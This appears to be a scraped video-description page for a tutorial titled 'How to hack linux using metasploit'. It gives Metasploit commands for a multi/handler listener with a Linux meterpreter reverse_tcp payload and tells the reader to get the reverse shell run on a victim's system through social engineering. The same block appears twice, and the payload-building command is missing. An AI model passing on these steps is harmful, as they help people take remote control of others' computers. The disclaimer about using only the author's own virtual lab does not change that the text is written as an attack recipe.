filmov
tv
How to hack linux using metasploit

Показать описание
note all the attacks r perform on my own virtual environment
and its command is very simple to make paylaod type
then start msfconsole to start handler to receive connection
after opening of metasploit type
use exploit/multi/handler
set paylaod linux/x64/meterpreter/reverse_tcp
exploit -j
and execute the reverse shell on the victim system by social engenerring
and after that u r good to go
and its command is very simple to make paylaod type
then start msfconsole to start handler to receive connection
after opening of metasploit type
use exploit/multi/handler
set paylaod linux/x64/meterpreter/reverse_tcp
exploit -j
and execute the reverse shell on the victim system by social engenerring
and after that u r good to go